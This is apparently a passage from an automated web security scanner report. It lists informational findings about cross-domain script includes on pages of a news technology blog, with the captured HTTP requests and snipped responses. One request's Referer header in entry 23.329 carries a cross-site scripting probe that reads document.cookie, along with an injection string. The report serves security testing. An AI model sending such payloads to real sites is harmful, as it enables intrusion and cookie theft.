Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.322. http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.323. http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.324. http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.325. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.326. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

Response

23.327. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/5b1bb6f5f29a6defa4ad5f0872c615f92d244547.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.328. http://technolog.msnbc.redacted/_nv/more/section/archive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_nv/more/section/archive

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630
http://www.polls.newsvine.com/_static/js/6fcc5bd2a149dc02951529f95ade36053a0ff882.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_nv/more/section/archive HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:52:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 243535

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/ffb30d0d6c6ea0fa18ad06ed093685a55fe064e8.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/6fcc5bd2a149dc02951529f95ade36053a0ff882.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.329. http://technolog.msnbc.redacted/_vine/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_vine/a

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://www.polls.newsvine.com/_static/js/6424485dfa93bc7ba9fe5d9f2e2924a193eab46a.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_vine/a HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_vine/printer?call=streamSessionObjects&sectionDomain=technolog&path=/_news/2011/01/28/*)(sn=*/b7e29%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E626a72a1b57
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377678; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:35:22 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40435

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/6424485dfa93bc7ba9fe5d9f2e2924a193eab46a.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.330. http://technolog.msnbc.redacted/amazon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/amazon

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /amazon HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.331. http://technolog.msnbc.redacted/android previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/android

Issue detail

